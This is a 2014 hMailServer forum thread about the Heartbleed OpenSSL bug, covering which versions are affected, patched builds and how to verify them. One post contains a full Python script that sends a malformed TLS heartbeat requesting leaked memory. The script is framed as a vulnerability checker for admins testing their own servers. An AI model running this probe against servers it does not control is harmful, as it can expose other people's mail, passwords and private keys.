Heartbleed Bug in OpenSSL

Use this forum if you have installed hMailServer and want to ask a question related to a production release of hMailServer. Before posting, please read the troubleshooting guide. A large part of all reported issues are already described in detail here.
Post Reply
yetanotherb
New user
New user
Posts: 3
Joined: 2014-04-08 11:10

Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 11:15

Hi,

is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)

This is a VERY serious problem :-(

Best regards,
B

mlg.odk
New user
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 12:19

Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.

I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.

yetanotherb
New user
New user
Posts: 3
Joined: 2014-04-08 11:10

Re: Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 12:33

Oooh boy.... :shock: :(

User avatar
martin
Developer
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden
Contact:

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 13:10

I will look into this and release a patch.

percepts
Senior user
Senior user
Posts: 5282
Joined: 2009-10-20 16:33
Location: Sceptred Isle

Re: Heartbleed Bug in OpenSSL

Post by percepts » 2014-04-08 13:56

Reading the full information release and the link to openssl.org news release it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
What versions of the OpenSSL are affected?

Status of different versions:
•OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
•OpenSSL 1.0.1g is NOT vulnerable
•OpenSSL 1.0.0 branch is NOT vulnerable
•OpenSSL 0.9.8 branch is NOT vulnerable

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

SCOOBY
New user
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 14:25

Hi,
Is there anyway I can tell what version of Open SSL my installation is using?
Cheers

mlg.odk
New user
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 14:29

percepts wrote:Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.

@martin: I am looking forward to the update.
SCOOBY wrote:Is there anyway I can tell what version of Open SSL my installation is using?
hMailServer 5.4 is using OpenSSL 1.0.1c.

User avatar
martin
Developer
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden
Contact:

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 14:33

I sent a security newsletter a while back informing users about this issue.

Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.

SCOOBY
New user
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 14:35

Thanks, eagerly awaiting the update!

Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?

User avatar
martin
Developer
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden
Contact:

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 14:39

If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.

Greta
Senior user
Senior user
Posts: 306
Joined: 2007-01-02 13:23
Contact:

Re: Heartbleed Bug in OpenSSL

Post by Greta » 2014-04-08 19:07

From what version use hmail OpenSSL 1.0.1?

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 19:18

2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Upated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.01.1g & incorporated into this build.

http://www.hmailserver.com/forum/viewto ... 10&t=21420

EDIT:
Also posted non-static linked build so openssl dll's can be used if needed. Obviously weird things can happen if you use incompatible DLL's so know what you are doing & only use if needed.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

SCOOBY
New user
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 19:59

Sorry if I'm being dense, but where do I download it from?

mlg.odk
New user
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 19:59

Thanks Bill48105, I can confirm that this update resolves the issue.

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:03

SCOOBY wrote:Sorry if I'm being dense, but where do I download it from?
You go to the experimental thead:
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:

Code: Select all

NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:05

mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

mlg.odk
New user
New user
Posts: 6
Joined: 2011-04-22 01:47

Re: Heartbleed Bug in OpenSSL

Post by mlg.odk » 2014-04-08 20:14

Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:22

mlg.odk wrote:
Bill48105 wrote:
mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

SCOOBY
New user
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 20:29

Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?

User avatar
martin
Developer
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden
Contact:

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 20:42

Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:46

martin wrote:Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.
SCOOBY wrote:Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

User avatar
RvdH
Senior user
Senior user
Posts: 803
Joined: 2008-06-27 14:42
Location: Netherlands

Re: Heartbleed Bug in OpenSSL

Post by RvdH » 2014-04-08 20:47

heartbleedtest.py

Code: Select all

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

# Modified for simplified checking by Yonathan Klijnsma

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

target = None

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
 
    return typ, ver, pay

def hit_hb(s):
    global target
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print target + '|NOT VULNERABLE'
            return False

        if typ == 24:
            if len(pay) > 3:
                print target + '|VULNERABLE'
            else:
                print target + '|NOT VULNERABLE'
            return True

        if typ == 21:
            print target + '|NOT VULNERABLE'
            return False

def main():
    global target
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    target = args[0]
    sys.stdout.flush()
    s.send(hello)
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465
CIDR to RegEx: d-fault.nl/CIDRtoRegEx
DNS Lookup: d-fault.nl/DNSTools
DNSBL Lookup: d-fault.nl/DNSBLLookup
GEOIP Lookup: d-fault.nl/GeoipLookup

sowen
New user
New user
Posts: 7
Joined: 2012-11-10 22:59

Re: Heartbleed Bug in OpenSSL

Post by sowen » 2014-04-08 20:47

http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 20:49

sowen wrote:http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
That's not looking good in terms of trusting that test.. Did you try the python script?
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

lucb1e
New user
New user
Posts: 3
Joined: 2014-02-22 02:04

Re: Heartbleed Bug in OpenSSL

Post by lucb1e » 2014-04-08 20:57

I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Last edited by lucb1e on 2014-04-08 21:01, edited 1 time in total.

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 21:01

lucb1e wrote:I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching whcih said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers. :o
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

User avatar
martin
Developer
Developer
Posts: 6834
Joined: 2003-11-21 01:09
Location: Sweden
Contact:

Re: Heartbleed Bug in OpenSSL

Post by martin » 2014-04-08 21:30

There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 21:32

martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

yetanotherb
New user
New user
Posts: 3
Joined: 2014-04-08 11:10

Re: Heartbleed Bug in OpenSSL

Post by yetanotherb » 2014-04-08 21:40

Great Job!

Thanks a lot for the fast response!

Best regards,
B

SCOOBY
New user
New user
Posts: 5
Joined: 2014-04-08 14:21

Re: Heartbleed Bug in OpenSSL

Post by SCOOBY » 2014-04-08 22:04

Thanks guys, server patched and hopefully that is that!!

sowen
New user
New user
Posts: 7
Joined: 2012-11-10 22:59

Re: Heartbleed Bug in OpenSSL

Post by sowen » 2014-04-08 22:17

This tester reports the patched version as not vulnerable:
http://possible.lv/tools/hb/?sp

Thanks!

User avatar
mattg
Moderator
Moderator
Posts: 20218
Joined: 2007-06-14 05:12
Location: 'The Outback' Australia

Re: Heartbleed Bug in OpenSSL

Post by mattg » 2014-04-08 23:05

Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-08 23:36

mattg wrote:
Bill48105 wrote:
martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
martin is moving away from SVN repo in favor of github. He had setup a 'dev' one there awhile back but I stuck on the svn until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on github and setting up automated builds. Should help keep them in sync.

So long story short only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his but no ETA
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

Sune
Normal user
Normal user
Posts: 59
Joined: 2005-09-21 20:11
Location: Denmark
Contact:

Re: Heartbleed Bug in OpenSSL

Post by Sune » 2014-04-08 23:54

Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).

japi
New user
New user
Posts: 27
Joined: 2011-06-12 14:09
Location: Germany

Re: Heartbleed Bug in OpenSSL

Post by japi » 2014-04-09 01:11

martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Martin,
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service i would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hmailserver and many other opensource projects have done a great job in mitigating the most severe incident i can remember in the past 7 years. It was the sysadmins nightmare come true, every SSL-Port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped... :mrgreen:
Thanks a Million and keep up the great work!

Best Regards,
Jan

Kob
New user
New user
Posts: 15
Joined: 2005-10-01 13:02

Re: Heartbleed Bug in OpenSSL

Post by Kob » 2014-04-10 19:30

For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io

User avatar
Caspar
Senior user
Senior user
Posts: 377
Joined: 2008-09-08 11:47
Contact:

Re: Heartbleed Bug in OpenSSL

Post by Caspar » 2014-04-11 10:54

That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-11 18:50

Caspar wrote:That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
The python scripts above work. I tested them with hmail.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

User avatar
Caspar
Senior user
Senior user
Posts: 377
Joined: 2008-09-08 11:47
Contact:

Re: Heartbleed Bug in OpenSSL

Post by Caspar » 2014-04-14 10:05

Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php

Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-14 10:40

Caspar wrote:
Bill48105 wrote:
Caspar wrote:...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Yeah I hadn't tested it on a non SSL port but guess that makes sense since handshake hasn't completed yet on STARTLS enabled port although it is an SSL socket even before the handshake. But if one wants to test just test SSL & if it's OK STARTTLS ports would be too unless someone proves otherwise.
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

esc
New user
New user
Posts: 1
Joined: 2014-04-30 15:09

Re: Heartbleed Bug in OpenSSL

Post by esc » 2014-04-30 15:15

Sune wrote:Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
I would also like a definitive answer to this.

percepts
Senior user
Senior user
Posts: 5282
Joined: 2009-10-20 16:33
Location: Sceptred Isle

Re: Heartbleed Bug in OpenSSL

Post by percepts » 2014-04-30 15:46


Bill48105
Developer
Developer
Posts: 6192
Joined: 2010-04-24 23:16
Location: Michigan, USA

Re: Heartbleed Bug in OpenSSL

Post by Bill48105 » 2014-04-30 17:50

Version 5.3.3 - Build 1879 (2010-06-06) - Production

Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***

Post Reply